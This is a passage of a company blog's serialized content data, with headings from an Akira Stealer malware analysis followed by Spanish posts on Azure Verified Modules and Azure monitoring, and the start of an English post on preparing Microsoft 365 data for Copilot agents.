gofor4msi)",{"id":6204,"depth":111,"text":6205},{"id":6325,"depth":111,"text":6326},{"id":6423,"depth":111,"text":6424},{"id":6519,"depth":111,"text":6520},{"id":6594,"depth":111,"text":6595},{"id":6665,"depth":111,"text":6666},{"id":6725,"depth":111,"text":6726},{"id":6860,"depth":111,"text":6861},{"id":6921,"depth":111,"text":6922,"children":16810},[16811],{"id":6933,"depth":329,"text":6934},{"id":7282,"depth":111,"text":7283,"children":16813},[16814,16815,16816,16817,16818,16819],{"id":7291,"depth":329,"text":7292},{"id":7405,"depth":329,"text":7406},{"id":7602,"depth":329,"text":7603},{"id":7891,"depth":329,"text":7892},{"id":7967,"depth":329,"text":7968},{"id":8127,"depth":329,"text":8128},{"id":8362,"depth":111,"text":8363},{"id":8408,"depth":111,"text":8409},{"id":8420,"depth":111,"text":8421,"children":16823},[16824,16825,16826,16827],{"id":8426,"depth":329,"text":8427},{"id":8470,"depth":329,"text":8471},{"id":8532,"depth":329,"text":8533},{"id":8567,"depth":329,"text":8568},{"id":8603,"depth":111,"text":16829,"children":16830},"7.3 Anti-Analysis / Evasion (Class: VmProtect)",[16831,16832,16833,16834,16836,16837,16838,16839,16840,16841,16842,16843,16844,16845],{"id":8612,"depth":329,"text":8613},{"id":8627,"depth":329,"text":8628},{"id":8667,"depth":329,"text":8668},{"id":8756,"depth":329,"text":16835},"7.3.4 VmProtect Architecture",{"id":9109,"depth":329,"text":9110},{"id":9175,"depth":329,"text":9176},{"id":9244,"depth":329,"text":9245},{"id":9308,"depth":329,"text":9309},{"id":9376,"depth":329,"text":9377},{"id":9433,"depth":329,"text":9434},{"id":9531,"depth":329,"text":9532},{"id":9601,"depth":329,"text":9602},{"id":10057,"depth":329,"text":10058},{"id":10104,"depth":329,"text":10105},{"id":10118,"depth":111,"text":10119,"children":16847},[16848,16849,16851,16853,16855,16857,16859,16861,16863],{"id":10277,"depth":329,"text":10278},{"id":10385,"depth":329,"text":16850},"7.4.2 Password Dumper 
(Chromium.GetPasswords)",{"id":10507,"depth":329,"text":16852},"7.4.3 Credit Card Dumper (Chromium.GetCreditCards)",{"id":10589,"depth":329,"text":16854},"7.4.4 Cookie Dumper (Chromium.GetCookies)",{"id":10669,"depth":329,"text":16856},"7.4.5 Google Session Dumper (Chromium.dump_google_sessions)",{"id":10796,"depth":329,"text":16858},"7.4.6 History Dumper (Chromium.GetHistory)",{"id":10866,"depth":329,"text":16860},"7.4.7 Autofill Dumper (Chromium.GetAutofills)",{"id":10929,"depth":329,"text":16862},"7.4.8 Firefox Profile Grabber (GeckoDriver & grabFirefoxProfiles)",{"id":11007,"depth":329,"text":11008},{"id":11046,"depth":111,"text":11047},{"id":11378,"depth":111,"text":11379},{"id":11492,"depth":111,"text":11493},{"id":11820,"depth":111,"text":11821,"children":16868},[16869,16870,16871,16872,16873,16874],{"id":11829,"depth":329,"text":11830},{"id":11980,"depth":329,"text":11981},{"id":12086,"depth":329,"text":12087},{"id":12211,"depth":329,"text":12212},{"id":12278,"depth":329,"text":12279},{"id":12403,"depth":329,"text":12404},{"id":12508,"depth":111,"text":16876,"children":16877},"7.9. 
Discord and Telegram Token Theft (Class: Discord)",[16878,16879,16880,16881],{"id":12522,"depth":329,"text":12523},{"id":12653,"depth":329,"text":12654},{"id":12897,"depth":329,"text":12898},{"id":12978,"depth":329,"text":12979},{"id":13048,"depth":111,"text":13049,"children":16883},[16884,16886,16887,16888],{"id":13061,"depth":329,"text":16885},"7.10.1 Data Class Initialization",{"id":13159,"depth":329,"text":13160},{"id":13279,"depth":329,"text":13280},{"id":13344,"depth":329,"text":13345},{"id":13421,"depth":111,"text":16890,"children":16891},"7.11 File Grabber (Class: Utils.steal_files)",[16892,16893,16894,16895,16896,16897],{"id":13433,"depth":329,"text":13434},{"id":13504,"depth":329,"text":13505},{"id":13566,"depth":329,"text":13567},{"id":13599,"depth":329,"text":13600},{"id":13628,"depth":329,"text":13629},{"id":13807,"depth":329,"text":13808},{"id":13915,"depth":111,"text":13916,"children":16899},[16900,16901,16902,16903,16904],{"id":13924,"depth":329,"text":13925},{"id":13939,"depth":329,"text":13940},{"id":14018,"depth":329,"text":14019},{"id":14167,"depth":329,"text":14168},{"id":14400,"depth":329,"text":14401},{"id":14751,"depth":111,"text":14752},{"id":14782,"depth":111,"text":14783},{"id":14906,"depth":111,"text":14907},{"id":15017,"depth":111,"text":15018},{"id":15068,"depth":111,"text":15069},{"id":15245,"depth":111,"text":15246},{"id":15295,"depth":111,"text":15296},{"id":15339,"depth":111,"text":15340},{"id":15379,"depth":111,"text":15380},{"id":15470,"depth":111,"text":15471},{"id":15487,"depth":111,"text":15488},{"id":16010,"depth":111,"text":16011},{"id":16316,"depth":111,"text":16317},{"id":16437,"depth":111,"text":16438},{"id":16500,"depth":111,"text":16501},{"id":16672,"depth":111,"text":16673},{"lang":2257,"seoTitle":16922,"titleClass":2172,"date":16923,"categories":16924,"blogtitlepic":16925,"socialimg":16926,"customExcerpt":16927,"keywords":16928,"maxContent":2180,"asideNav":16929,"footer":16978,"contactInContent":16979,"published":2180,
"hreflang":17010},"Akira Stealer: Technical Analysis of a Modular Info-Stealing Malware","2025-06-16",[2175],"head-quiet-breach.png","/blog/heads/head-quiet-breach.png","It started with a single Defender alert in Microsoft 365. No malware, no signatures, no panic. Just a whisper in the noise. What we uncovered was months of credential theft - surgical, silent, and nearly invisible. This is how our CSOC turned a quiet signal into a full-scale response. And gave our client back control before they even knew it was gone.","Microsoft 365 Security, Credential Theft Detection, Incident Response, Microsoft Defender, Managed Security Services, Cloud Security, Threat Detection, Cyber Attack Detection, CSOC, Advanced Threat Protection",{"menuItems":16930},[16931,16933,16936,16939,16942,16945,16948,16951,16954,16957,16960,16963,16966,16969,16972,16975],{"href":16932,"text":4575},"#prologue",{"href":16934,"text":16935},"#_1-initial-event-and-triage-summary","Initial Event and Triage Summary",{"href":16937,"text":16938},"#_2-malware-architecture-and-execution-chain-overview","Malware Architecture and Execution Chain Overview",{"href":16940,"text":16941},"#_3-deep-dive-updaterexe","Deep Dive: Updater.exe",{"href":16943,"text":16944},"#_4-deep-dive-powbat","Deep Dive: pow.bat",{"href":16946,"text":16947},"#_5-deep-dive-mainexe-electron-based-malware-loader","Deep Dive: main.exe",{"href":16949,"text":16950},"#_6-deep-dive-inputjs-the-encrypted-javascript-payload-loader","Deep Dive: input.js",{"href":16952,"text":16953},"#_7-deepdive-akira-stealer-v2-astorpy","DeepDive: Akira Stealer v2",{"href":16955,"text":16956},"#_8-circular-execution-chain-a-self-healing-loop","Circular Execution Chain",{"href":16958,"text":16959},"#_9-blockchain-tracking-and-analysis","Blockchain Tracking and Analysis",{"href":16961,"text":16962},"#_10-inside-the-akira-ecosystem-commercialized-cybercrime-infrastructure","Inside the Akira 
Ecosystem",{"href":16964,"text":16965},"#_11-akira-stealer-quickcheck-affected-files","Akira Stealer QuickCheck affected files",{"href":16967,"text":16968},"#_12-beyond-response-how-glueckkanja-csoc-turns-incidents-into-insights","How glueckkanja CSOC Turns Incidents into Insights",{"href":16970,"text":16971},"#_13-indicators-of-compromise-iocs","Indicators of Compromise (IOCs)",{"href":16973,"text":16974},"#_14-reflecting-on-the-akira-stealer-incident-strengthening-your-defense-with-glueckkanja-csoc","Reflecting on the Akira Stealer Incident",{"href":16976,"text":16977},"#_15-security-legal-disclaimer-use-of-real-malware-code","Security & Legal Disclaimer",{"noMargin":2180},{"quote":2167,"infos":16980},{"bgColor":3741,"color":2993,"boxBgColor":3742,"boxColor":2991,"headline":16981,"subline":16982,"level":41,"textStyling":2203,"flush":2204,"person":16983,"form":16990},"Get in touch now","As a leading Microsoft Security MSSP, we protect companies from cyber threats every day. Let´s talk and strengthen your cyber defenses together!",{"image":16984,"cloudinary":2180,"alt":16985,"name":16985,"detailsHeader":16986,"details":16987},"/people/people-pam-team.png","Project & Account Management","We look forward to hearing from you!",[16988,16989],{"text":2812,"href":2813,"details":3001,"icon":2815},{"text":2817,"href":2818,"icon":2819},{"ctaText":2821,"cta":16991,"method":2168,"action":16992,"fields":16993},{"skin":2214},"/en/successful",[16994,16997,17000,17003,17006,17008,17009],{"label":16995,"type":61,"id":2219,"required":2180,"requiredMsg":16996},"Name*","Please enter your name.",{"label":16998,"type":61,"id":2223,"required":2180,"requiredMsg":16999},"Company*","Please enter your company.",{"label":17001,"type":2227,"id":2227,"required":2180,"requiredMsg":17002},"Email address*","Please enter your email address.",{"label":17004,"type":2236,"id":2237,"required":2180,"requiredMsg":17005},"Your data will be stored with us for the purpose of processing and responding to 
your inquiry. For more information on data protection, please refer to our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.","Please confirm",{"type":2240,"id":2246,"value":17007},"Form: Blog MSSP 2025 | EN",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},[17011,17013],{"lang":2260,"href":17012},"/de/posts/2025-06-16-quiet-breach",{"lang":2257,"href":17014},"/en/posts/2025-06-16-quiet-breach","/posts/2025-06-16-quiet-breach",{"title":4568,"description":31},"posts/2025-06-16-quiet-breach",[17019,2268,2272,17020],"Microsoft 365 Defender","Incident Deep Dive","hrFoZQsecd8hWGrTtLDFNcg1Px0SS6jNQMld7gg-f2M",{"id":17023,"title":17024,"author":17025,"body":17026,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":17193,"moment":2165,"navigation":2180,"path":17223,"seo":17224,"stem":17225,"tags":17226,"webcast":2167,"__hash__":17230},"content_es/posts/2025-07-22-azure-certified-modules.md","Next Level Azure IaC: Azure Verified Modules",[2509],{"type":9,"value":17027,"toc":17186},[17028,17032,17034,17043,17046,17057,17060,17063,17071,17075,17077,17080,17083,17097,17100,17103,17107,17109,17112,17116,17118,17121,17124,17127,17147,17150,17158,17161,17165],[41,17029,17031],{"id":17030},"módulo-verificado-de-azure-iac-según-las-mejores-prácticas-de-microsoft","Módulo Verificado de Azure – IaC según las mejores prácticas de Microsoft",[12,17033,31],{},[12,17035,17036,17037,17042],{},"Microsoft se propuso enfrentar este desafío y lanzó los",[2630,17038,17041],{"href":17039,"rel":17040},"https://azure.github.io/Azure-Verified-Modules/",[3135],"Azure Verified Modules (AVM)",": un marco diseñado para desplegar recursos en Azure siguiendo las mejores prácticas.",[12,17044,17045],{},"Los AVM vienen en tres variantes bien definidas:",[1255,17047,17048,17051,17054],{},[1258,17049,17050],{},"Resource Modules – Implementación de un recurso específico en la nube.",[1258,17052,17053],{},"Pattern Modules – Implementación de una 
carga de trabajo predefinida.",[1258,17055,17056],{},"Utility Modules – Módulos auxiliares utilizados por Resource o Pattern Modules.",[12,17058,17059],{},"Para garantizar un estándar común, Microsoft estableció requisitos que todo nuevo recurso AVM debe cumplir. Esto aplica tanto a Terraform como a Bicep, el propio lenguaje IaC de Microsoft Azure.",[12,17061,17062],{},"Cada AVM tiene un responsable designado dentro de Microsoft que se encarga de su creación, mantenimiento y resolución de problemas.",[12,17064,17065,17066,17070],{},"Y, en un giro muy característico de la cultura open source, todos los módulos están disponibles bajo licencia MIT en los repositorios públicos de la ",[2630,17067,17069],{"href":17068},"https://github.com/Azure","Azure GitHub Organisation",". ¿Un módulo falla? ¿Falta un parámetro crítico? Cualquiera puede abrir un issue o contribuir directamente al desarrollo.",[41,17072,17074],{"id":17073},"cómo-empezar-con-avm","¿Cómo empezar con AVM?",[12,17076,31],{},[12,17078,17079],{},"Los AVM funcionan igual que cualquier otro módulo en Terraform o Bicep: se invocan de forma independiente y reciben los parámetros necesarios. 
Las directrices de AVM reducen estos parámetros al mínimo, allanando el camino para una adopción sin fricciones.",[12,17081,17082],{},"Ejemplo con Terraform:\nPara desplegar una máquina virtual con un disco de datos adicional, normalmente necesitas al menos estos recursos de Azure:",[1255,17084,17085,17088,17091,17094],{},[1258,17086,17087],{},"azurerm_windows_virtual_machine oder azurerm_linux_virtual_machine",[1258,17089,17090],{},"azurerm_network_interface",[1258,17092,17093],{},"azurerm_managed_disk",[1258,17095,17096],{},"azurerm_virtual_machine_data_disk_attachment\u003C",[12,17098,17099],{},"Cada uno de estos recursos exige parámetros recurrentes como el nombre del grupo de recursos, la región de destino o la propia denominación de los recursos.",[12,17101,17102],{},"Con AVM, todo ese entramado se reduce a una única llamada con los parámetros esenciales. El módulo se encarga del resto. Además, como los AVM ya integran las mejores prácticas de Microsoft, muchos valores vienen preconfigurados: TLS 1.2 habilitado por defecto o el bloqueo del acceso público son solo dos ejemplos claros.",[41,17104,17106],{"id":17105},"qué-hacer-si-no-existe-un-avm-para-mi-recurso","¿Qué hacer si no existe un AVM para mi recurso?",[12,17108,31],{},[12,17110,17111],{},"La licencia open source de AVM ofrece un camino claro: cualquiera puede iniciar su propio desarrollo basándose en este marco. 
Y si más adelante Microsoft decide crear un módulo oficial para ese recurso, tu trabajo previo puede convertirse en una contribución valiosa para toda la comunidad.",[41,17113,17115],{"id":17114},"gkvm-glueckkanja-️-open-source","GKVM - glueckkanja ❤️ Open Source",[12,17117,31],{},[12,17119,17120],{},"En glueckkanja seguimos exactamente este enfoque y apoyamos a nuestros clientes en el desarrollo de módulos basados en el framework AVM, los cuales posteriormente ponemos a disposición del público.",[12,17122,17123],{},"A estos módulos los llamamos GKVM (GlueckKanja Verified Modules), porque no solo cumplen con los lineamientos de AVM, sino que también incorporan el conocimiento que hemos acumulado en numerosos proyectos reales.",[12,17125,17126],{},"GKVM Resouce Modules:",[1255,17128,17129,17135,17141],{},[1258,17130,17131],{},[2630,17132,17134],{"href":17133},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-synapse-workspace/azurerm/latest","Azure Synapse Workspace",[1258,17136,17137],{},[2630,17138,17140],{"href":17139},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-iot-hub/azurerm/latest","Azure IoT Hub",[1258,17142,17143],{},[2630,17144,17146],{"href":17145},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-messaging-eventgridsystemtopic/azurerm/latest","Azure Event Grid System Topic",[12,17148,17149],{},"GKVM Pattern Modules:",[1255,17151,17152],{},[1258,17153,17154],{},[2630,17155,17157],{"href":17156},"https://registry.terraform.io/modules/glueckkanja/gkvm-ptn-myworkid/azurerm/latest","My WorkId",[12,17159,17160],{},"¡Agradecemos cualquier issue que ayude a ampliar los módulos con nuevas funcionalidades!",[41,17162,17164],{"id":17163},"recursos-adicionales","Recursos adicionales",[1255,17166,17167,17173,17179],{},[1258,17168,17169],{},[2630,17170,17172],{"href":17171},"/es/azure/azure-foundation","glueckkanja Azure 
Foundation",[1258,17174,17175],{},[2630,17176,17178],{"href":17177},"/es/posts/2023-04-14-workload-management-with-azure-foundation","Azure Foundation: Cloud-Management eficiente con Terraform",[1258,17180,17181],{},[2630,17182,17185],{"href":17183,"rel":17184},"https://www.terraprovider.com/",[3135],"Terraform Provider for Microsoft 365",{"title":65,"searchDepth":111,"depth":111,"links":17187},[17188,17189,17190,17191,17192],{"id":17030,"depth":111,"text":17031},{"id":17073,"depth":111,"text":17074},{"id":17105,"depth":111,"text":17106},{"id":17114,"depth":111,"text":17115},{"id":17163,"depth":111,"text":17164},{"lang":2170,"seoTitle":17031,"titleClass":2172,"date":17194,"categories":17195,"blogtitlepic":17196,"socialimg":17197,"customExcerpt":17198,"keywords":17199,"contactInContent":17200,"hreflang":17216,"footer":17221,"scripts":17222},"2025-07-22",[3243],"head-azure-certified.png","/blog/heads/head-azure-certified.png","La infraestructura como código (IaC), especialmente con Terraform, es una pieza clave de nuestra Azure Foundation y un elemento esencial en toda transformación hacia la nube. Lo hemos visto una y otra vez: un uso estructurado de IaC no solo acelera la adopción de servicios en la nube, sino que también impulsa el desarrollo de nuevos productos. 
Y aquí surge la pregunta inevitable: ¿cuál es el mejor punto de partida?","Azure Verified Modules, AVM, Infrastructure as Code, IaC, Terraform, Bicep, Microsoft Best Practices, Azure Module Deployment, Azure Foundation, Open Source Azure, Azure IaC, Azure Automation",{"quote":2180,"infos":17201},{"headline":2918,"subline":2919,"level":41,"textStyling":2203,"flush":2204,"person":17202,"form":17206},{"image":2921,"cloudinary":2180,"alt":2499,"name":2499,"quotee":2499,"quoteeTitle":2922,"quote":2923,"detailsHeader":2924,"details":17203},[17204,17205],{"text":2927,"href":2928,"details":2929,"icon":2815},{"text":2817,"href":2818,"icon":2819},{"ctaText":2212,"cta":17207,"method":2168,"action":2215,"fields":17208},{"skin":2214},[17209,17210,17211,17212,17213,17214,17215],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},{"label":2936,"type":61,"id":2223,"required":2180,"requiredMsg":2827},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},{"label":2939,"type":2236,"id":2237,"required":2180,"requiredMsg":2940},{"type":2240,"id":2246,"value":2942},{"type":2240,"id":2249,"value":2944},{"type":2240,"id":2252},[17217,17219],{"lang":2257,"href":17218},"/en/posts/2025-07-22-azure-certified-modules",{"lang":2260,"href":17220},"/de/posts/2025-07-22-azure-certified-modules",{"noMargin":2180},{"slick":2180},"/posts/2025-07-22-azure-certified-modules",{"title":17024,"description":65},"posts/2025-07-22-azure-certified-modules",[17227,17228,17229,4074],"Infrastructure as Code","Azure Verified Modules","Terraform","-KnN-oo6aMEkfsfqlMlBcdrGKhiuBPjqfVc2fZhM1jo",{"id":17232,"title":17233,"author":17234,"body":17235,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":17337,"moment":2165,"navigation":2180,"path":17367,"seo":17368,"stem":17369,"tags":17370,"webcast":2167,"__hash__":17371},"content_es/posts/2025-08-27-azure-monitor.md","Monitorización que crece contigo – Soluciones orgánicas en 
Azure",[2543],{"type":9,"value":17236,"toc":17329},[17237,17241,17243,17246,17250,17252,17255,17272,17275,17279,17281,17284,17287,17290,17294,17296,17299,17302,17306,17308,17311,17314,17317,17320,17324,17326],[41,17238,17240],{"id":17239},"monitorización-en-azure","Monitorización en Azure",[12,17242,31],{},[12,17244,17245],{},"La monitorización en la nube es mucho más que solo recopilar métricas. En entornos dinámicos de Azure, se trata de capturar información relevante de manera dirigida, visualizarla de forma significativa y responder automáticamente. El enfoque no solo está en los aspectos técnicos, sino también en la escalabilidad, el control de costes y la gobernanza.",[41,17247,17249],{"id":17248},"monitorización-holística-con-azure-más-que-solo-métricas","Monitorización holística con Azure – Más que solo métricas",[12,17251,31],{},[12,17253,17254],{},"Un concepto moderno de monitorización en Azure incluye varios componentes:",[1255,17256,17257,17260,17263,17266,17269],{},[1258,17258,17259],{},"Azure Monitor como la plataforma central para métricas, registros y alertas",[1258,17261,17262],{},"Log Analytics para análisis en profundidad y correlación",[1258,17264,17265],{},"Application Insights para la monitorización de aplicaciones",[1258,17267,17268],{},"Workbooks y paneles para la visualización",[1258,17270,17271],{},"Action Groups y Logic Apps para respuestas automatizadas",[12,17273,17274],{},"La monitorización se vuelve especialmente valiosa cuando abarca no solo recursos nativos de la nube, sino también escenarios híbridos. Con Azure Arc, los sistemas locales y otras nubes pueden integrarse sin problemas, incluyendo registro, alertas y aplicación de políticas. 
Esto crea una vista coherente de toda la infraestructura.",[41,17276,17278],{"id":17277},"seguimiento-de-cambios-e-inventario-change-tracking-inventory","Seguimiento de cambios e inventario – Change Tracking & Inventory",[12,17280,31],{},[12,17282,17283],{},"Un aspecto a menudo subestimado de la monitorización es el seguimiento de los cambios en los recursos. Con Azure Change Tracking, los cambios de configuración en máquinas virtuales, archivos, entradas de registro e instalaciones de software pueden registrarse automáticamente y analizarse históricamente. Esto es especialmente útil para el análisis de la causa raíz de incidentes o para cumplir con requisitos de cumplimiento.",[12,17285,17286],{},"Esto se complementa con la función de Inventario, que proporciona una visión completa del software instalado, servicios en ejecución y configuraciones del sistema, tanto para máquinas virtuales de Azure como para sistemas locales integrados a través de Azure Arc. Esto crea una vista central del estado técnico del entorno, que puede integrarse perfectamente en las estructuras existentes de monitorización y gobernanza.",[12,17288,17289],{},"Combinado con Log Analytics y alertas automatizadas, Change Tracking se convierte en una herramienta poderosa para operaciones transparentes, análisis rápido de errores y documentación conforme.",[41,17291,17293],{"id":17292},"control-de-costos-mediante-registros-dirigidos","Control de costos mediante registros dirigidos",[12,17295,31],{},[12,17297,17298],{},"Un obstáculo común en la monitorización es el desarrollo de costos debido a registros no controlados. Azure ofrece varios niveles de Pricing Tiers con Log Analytics, lo que hace que la retención a largo plazo sea rentable. 
Al seleccionar períodos de retención y estrategias de muestreo adecuados, los costos pueden reducirse significativamente sin sacrificar información importante.",[12,17300,17301],{},"Un enfoque estructurado ayuda a diseñar el Logging de manera dirigida y eficiente. Azure Policy juega un papel clave aquí: con políticas predefinidas, la configuración de diagnóstico puede aplicarse automáticamente a los nuevos recursos. Esto garantiza la coherencia y reduce significativamente el esfuerzo manual.",[41,17303,17305],{"id":17304},"monitorización-como-servicio-gestionado","Monitorización como servicio gestionado",[12,17307,31],{},[12,17309,17310],{},"La monitorización efectiva comienza con una base estable y estructurada. En entornos de Azure, una Landing Zone proporciona la base necesaria para implementar la gobernanza, la seguridad y las operaciones de manera coherente. Esta base incluye no solo la infraestructura de red y la gestión de identidades, sino también un marco de monitorización bien pensado.",[12,17312,17313],{},"Nuestra Azure Foundation demuestra cómo puede funcionar esto: aporta un conjunto de alertas probadas, configuraciones de registro y controles de Azure Policy que garantizan que los nuevos recursos se configuren automáticamente con los ajustes correctos. Esto crea un entorno donde la transparencia y la seguridad operativa se consideran desde el principio.",[12,17315,17316],{},"Sobre esta base, se pueden proporcionar zonas de aplicaciones (App Zones) para aplicaciones específicas. Estas zonas son flexibles y pueden integrarse en la monitorización existente con alertas personalizadas y registros automatizados. Esto mantiene el entorno escalable y permite que crezca según los requisitos, sin perder visibilidad ni estandarización.",[12,17318,17319],{},"Esta estructura garantiza que la monitorización no solo sea técnicamente sólida, sino también estratégicamente escalable. 
Los estándares proporcionan coherencia, mientras que la modularidad permite requisitos individuales. Un servicio gestionado puede apoyarle asumiendo la operación, el mantenimiento y el desarrollo posterior. Esto crea libertad para centrarse en lo que realmente importa: su negocio principal, el desarrollo de productos o la optimización de procesos empresariales.",[41,17321,17323],{"id":17322},"conclusión","Conclusión",[12,17325,31],{},[12,17327,17328],{},"La monitorización moderna en Azure es un pilar clave para operaciones en la nube estables y seguras. Quienes se centran desde el principio en la estandarización, la automatización y el control de costos sientan las bases para la transparencia, la eficiencia y el crecimiento sostenible.",{"title":65,"searchDepth":111,"depth":111,"links":17330},[17331,17332,17333,17334,17335,17336],{"id":17239,"depth":111,"text":17240},{"id":17248,"depth":111,"text":17249},{"id":17277,"depth":111,"text":17278},{"id":17292,"depth":111,"text":17293},{"id":17304,"depth":111,"text":17305},{"id":17322,"depth":111,"text":17323},{"lang":2170,"seoTitle":17233,"titleClass":2172,"date":17338,"categories":17339,"blogtitlepic":17340,"socialimg":17341,"customExcerpt":17342,"keywords":17343,"contactInContent":17344,"hreflang":17360,"footer":17365,"scripts":17366},"2025-08-27",[3243],"head-azure-monitor.png","/blog/heads/head-azure-monitor.png","Cómo la monitorización moderna de Azure crea transparencia y deja espacio para lo que realmente importa","Azure Monitor, Microsoft Best Practices, Azure, Azure 
Foundation",{"quote":2180,"infos":17345},{"headline":2918,"subline":2919,"level":41,"textStyling":2203,"flush":2204,"person":17346,"form":17350},{"image":2921,"cloudinary":2180,"alt":2499,"name":2499,"quotee":2499,"quoteeTitle":2922,"quote":2923,"detailsHeader":2924,"details":17347},[17348,17349],{"text":2927,"href":2928,"details":2929,"icon":2815},{"text":2817,"href":2818,"icon":2819},{"ctaText":2212,"cta":17351,"method":2168,"action":2215,"fields":17352},{"skin":2214},[17353,17354,17355,17356,17357,17358,17359],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},{"label":2936,"type":61,"id":2223,"required":2180,"requiredMsg":2827},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},{"label":2939,"type":2236,"id":2237,"required":2180,"requiredMsg":2940},{"type":2240,"id":2246,"value":2942},{"type":2240,"id":2249,"value":2944},{"type":2240,"id":2252},[17361,17363],{"lang":2260,"href":17362},"/de/posts/2025-08-27-azure-monitor",{"lang":2257,"href":17364},"/en/posts/2025-08-27-azure-monitor",{"noMargin":2180},{"slick":2180},"/posts/2025-08-27-azure-monitor",{"title":17233,"description":65},"posts/2025-08-27-azure-monitor",[17228,17229,4074],"K4SJtVy2dQvfNdhC4xQ4vZhyeKIyx5ebFFWrQl2_buY",{"id":17373,"title":17374,"author":17375,"body":17376,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":18084,"moment":2165,"navigation":2180,"path":18146,"seo":18147,"stem":18148,"tags":18149,"webcast":2167,"__hash__":18154},"content_es/posts/2025-08-28-agent-ready-infrastructure.md","This is why you need a solid infrastructure to be agent-ready in 
2025",[2524],{"type":9,"value":17377,"toc":18045},[17378,17380,17382,17388,17395,17399,17401,17404,17407,17412,17422,17429,17434,17443,17453,17471,17475,17477,17480,17484,17486,17489,17493,17495,17502,17506,17508,17519,17526,17528,17531,17551,17555,17557,17560,17564,17566,17573,17577,17579,17582,17586,17588,17599,17603,17605,17608,17612,17614,17617,17622,17636,17639,17642,17646,17648,17652,17654,17661,17664,17672,17680,17684,17686,17689,17695,17698,17703,17708,17712,17714,17721,17725,17727,17734,17742,17746,17748,17751,17754,17758,17760,17763,17766,17773,17777,17779,17782,17785,17790,17793,17796,17800,17802,17808,17811,17817,17820,17825,17829,17831,17890,17894,17896,17918,17922,17924,17927,17931,17933,17936,17940,17942,17949,17953,17955,17966,17973,17978,17981,17985,17987,17993,18000,18004,18007,18010,18014,18016,18019,18022,18026,18028,18031],[41,17379,4575],{"id":4574},[12,17381,31],{},[12,17383,17384,17385,1014],{},"With this omnipresence, many ideas and the desire to take action or at least experiment arise. At glueckkanja AG, we support our customers throughout this process. Of course, we are already developing and building agents, but in 80% of our projects, the primary focus is on preparing the data and tenant for agent creation. Before you implement Copilot productively in your organization, it's worthwhile to take a critical look at your infrastructure. When making decisions in this area, there are several important aspects to understand before deploying AI agents on a large scale. That’s why, in this blog post, I will guide you through the essential steps and differences. 
In a time when AI assistants like Microsoft 365 Copilot Agents promise to transform the working world, one principle holds true above all: ",[4328,17386,17387],{},"AI is only as good as the system beneath it",[12,17389,17390,17391,17394],{},"This comprehensive guide outlines ",[251,17392,17393],{},"how to prepare your data and infrastructure"," for Copilot Agents, covering key practices in SharePoint, Teams, and the Power Platform.",[41,17396,17398],{"id":17397},"why-your-infrastructure-data-matters","Why your infrastructure (data) matters",[12,17400,31],{},[12,17402,17403],{},"As we utilize AI agents, it is imperative to understand that these agents do not inherently possess knowledge about our organization, our data, or our unique operational context. By default, an AI agent only carries the built-in knowledge derived from the training of the Large Language Model (LLM). To effectively enhance and extend the capabilities of these AI agents, it is essential to systematically integrate various components. This enhancement can be achieved through the implementation of System Prompts, Knowledge Bases, Connectors, Web-Search functionalities, access to Microsoft Graph, Semantic Search, and additional tools. These components collectively enable the AI agents to deliver more precise, contextually relevant responses and actions, aligning closely with the specific needs and data of the organization. Since we are now in the very beginning of the agentic area, many of us will start with simple agents that source information based on existing SharePoint Online libraries.",[12,17405,17406],{},"For us in IT, that means we need to take care about our data in SharePoint Online more than ever!",[2109,17408,17409],{},[12,17410,17411],{},"SharePoint Online = Knowledge = Data and Data = Key",[12,17413,17414,17417,17418,17421],{},[251,17415,17416],{},"My clear message:"," Before adding AI copilots to your organization, ",[251,17419,17420],{},"get your data house in order",". 
The same data that feeds your Copilot Agents also feeds Microsoft 365 Copilot itself.",[12,17423,17424,17425,17428],{},"And not only that! Microsoft 365 Copilot is assessing the same data. If that data is cluttered, overshared, or poorly secured, the AI could surface incorrect or sensitive information unexpectedly. For example, imagine asking Copilot about company structure and receiving details of a confidential reorganization plan you weren’t meant to see. Such incidents occur when content is ",[251,17426,17427],{},"overshared"," (available too broadly) on platforms like SharePoint or Teams. Note: Copilot respects all existing permissions, which means something like this can only happen when permissions are misconfigured. Conversely, if data is siloed or inaccessible, AI assistants will be less useful.",[2109,17430,17431],{},[12,17432,17433],{},"Copilot only surfaces organizational data that the individual user has at least view permissions for!",[12,17435,17436,540,17439],{},[251,17437,17438],{},"Source:",[2630,17440,17441],{"href":17441,"rel":17442},"https://learn.microsoft.com/en-gb/copilot/microsoft-365/microsoft-365-copilot-privacy?azure-portal=true",[3135],[12,17444,17445,17448,17449,17452],{},[251,17446,17447],{},"Key takeaway:"," Enterprise AI succeeds only with a solid data foundation. A recent Microsoft report identifies ",[251,17450,17451],{},"data oversharing, data leakage, and noncompliant usage"," as top challenges to address before deploying AI. Organizations that invest in preparing SharePoint Online and other data sources will unlock Copilot’s benefits with confidence, while those who don’t risk security breaches or irrelevant AI outputs. 
Studies show about one-third of decision-makers lack full visibility into critical data.",[17454,17455,420,17456,420,17461,420,17464,420,17468],"picture",{},[17457,17458],"source",{"media":17459,"srcSet":17460},"(min-width: 992px)","https://res.cloudinary.com/c4a8/image/upload/blog/pics/data-security-report-statistics.png",[17457,17462],{"media":17463,"srcSet":17460},"(min-width: 768px)",[17457,17465],{"media":17466,"srcSet":17467},"(min-width: 576px)","https://res.cloudinary.com/c4a8/image/upload/blog/pics/data-security-report-statistics-mob.png",[2772,17469],{"src":17467,"alt":17470},"Two statistics on data risks: 30% of decision-makers lack visibility into business-critical data (Visibility Gap) and 87% of security leaders reported a data breach in the past year (Data Breach Prevalence).",[41,17472,17474],{"id":17473},"_10-steps-to-improve-your-m365-data-infrastructure-now","10 steps to improve your M365 data infrastructure now",[12,17476,31],{},[12,17478,17479],{},"Now we know your agents will need data. As we as glueckkanja step in these projects, this is our typical 10-point list that we work from the top to end with our 